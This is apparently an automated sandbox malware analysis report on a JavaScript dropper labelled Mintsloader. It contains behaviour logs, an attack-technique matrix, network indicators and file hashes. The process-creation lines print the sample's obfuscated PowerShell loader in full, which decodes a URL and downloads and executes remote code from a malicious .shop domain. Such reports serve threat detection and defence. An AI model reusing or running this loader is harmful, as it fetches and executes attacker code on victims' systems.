Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC3C7F0F21 sldt word ptr [eax]2_2_00007FFC3C7F0F21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4165Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3764Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 4165 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 3764 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8104Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xmtwzilk='ur' ;set-alias protons c$($xmtwzilk)l;$fovrdle=(6812,6860,6863,6876,6879,6871,6863,6876,6860,6808,6877,6866,6873,6874,6809,6811,6808,6874,6866,6874,6825,6877,6823,6864,6870,6867,6860,6859,6860,6861,6812,6812);$lukhvjgc=('ertigos','get-cmdlet');$arczugy=$fovrdle;foreach($aolnsembz in $arczugy){$pdjoywbzaf=$aolnsembz;$bcwuyipnds=$bcwuyipnds+[char]($pdjoywbzaf-6762);$xrulwmcyqbk=$bcwuyipnds; $gjicsretdvanx=$xrulwmcyqbk};$movkfdqx[2]=$gjicsretdvanx;$uilwjshkcqx='rl';$xzsofvgu=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $gjicsretdvanx)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts11
Windows Management Instrumentation
2
Scripting
11
Process Injection
31
Virtualization/Sandbox Evasion
OS Credential Dumping1
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts11
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
11
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Exploitation for Client Execution
Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
Obfuscated Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets13
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
js (2).js41%VirustotalBrowse
js (2).js44%ReversingLabsWin32.Trojan.Mintsloader
SAMPLE100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://2berumerb.shop/1.php?s=flibabc22P)0%Avira URL Cloudsafe
http://2berumerb.shop/1.php?s=flibabc220%Avira URL Cloudsafe
http://2berumerb.shop0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    pki-goog.l.google.com
    142.251.15.94
    truefalse
      high
      2berumerb.shop
      unknown
      unknownfalse
        unknown
        c.pki.goog
        unknown
        unknownfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://2berumerb.shop/1.php?s=flibabc22powershell.exe, 00000002.00000002.1361924813.000002A497C2D000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1376949639.000002A4A6493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1361924813.000002A497EE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://2berumerb.shoppowershell.exe, 00000002.00000002.1361924813.000002A497C2D000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://go.micropowershell.exe, 00000002.00000002.1361924813.000002A49704C000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1376949639.000002A4A6493000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.1376949639.000002A4A65D5000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1361924813.000002A496421000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://2berumerb.shop/1.php?s=flibabc22P)powershell.exe, 00000002.00000002.1382086536.000002A4AEC6C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1361924813.000002A496421000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1361924813.000002A49664C000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                No contacted IP infos
                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1664663
                                Start date and time:2025-04-14 16:45:42 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 16s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Run name:Without Instrumentation
                                Number of analysed new started processes analysed:3
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:js (2).js
                                Detection:MAL
                                Classification:mal72.expl.winJS@4/3@2/0
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 6
                                • Number of non-executed functions: 1
                                Cookbook Comments:
                                • Found application associated with file extension: .js
                                • Stop behavior analysis, all processes terminated
                                • Excluded IPs from analysis (whitelisted): 23.4.43.62, 23.76.34.6, 4.175.87.197
                                • Excluded domains from analysis (whitelisted): cac-ocsp.digicert.com.edgekey.net, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, e3913.cd.akamaiedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net
                                • Execution Graph export aborted for target powershell.exe, PID 7992 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                TimeTypeDescription
                                10:46:57API Interceptor12x Sleep call for process: powershell.exe modified
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                pki-goog.l.google.comhttp://rednosehorse.comGet hashmaliciousUnknownBrowse
                                • 74.125.138.94
                                Proforma Invoice 070425.jsGet hashmaliciousAgentTeslaBrowse
                                • 172.253.124.94
                                CFD_I1328________________.exeGet hashmaliciousDarkCloudBrowse
                                • 74.125.138.94
                                PO#86637.exeGet hashmaliciousFormBookBrowse
                                • 74.125.138.94
                                bceff6c50e52949809b37dad0e10534d3a0c81682a3fb036.ps1Get hashmaliciousLummaC StealerBrowse
                                • 74.125.136.94
                                SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                • 108.177.122.94
                                SecuriteInfo.com.Win32.MalwareX-gen.10646.29484.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                • 74.125.138.94
                                rc.ps1Get hashmaliciousAsyncRAT, DcRatBrowse
                                • 142.250.9.94
                                Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                • 172.253.124.94
                                92.255.85.2.exeGet hashmaliciousDcRatBrowse
                                • 172.253.124.94
                                bg.microsoft.map.fastly.netTemplatePedidoExtracaoDSI_original_.xlsmGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                http://rednosehorse.comGet hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                ENQUIRY OFFICE BUILDING SHAKHBOUT CITY PURCAHSE ORDER454646.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                • 199.232.214.172
                                Proforma Invoice 070425.jsGet hashmaliciousAgentTeslaBrowse
                                • 199.232.214.172
                                dwm.batGet hashmaliciousAsyncRAT, Batch Injector, PureLog Stealer, zgRATBrowse
                                • 199.232.210.172
                                script.ps1Get hashmaliciousUnknownBrowse
                                • 199.232.210.172
                                CFD_I1328________________.exeGet hashmaliciousDarkCloudBrowse
                                • 199.232.210.172
                                Upstage.vbsGet hashmaliciousGuLoaderBrowse
                                • 199.232.210.172
                                STATEMENT OF OVERDUE INVOICES ---MARCH2025.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                • 199.232.210.172
                                10042025_CREDITADVICE.xlsGet hashmaliciousUnknownBrowse
                                • 199.232.214.172
                                No context
                                No context
                                No context
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllulbnolz:NllUc
                                MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
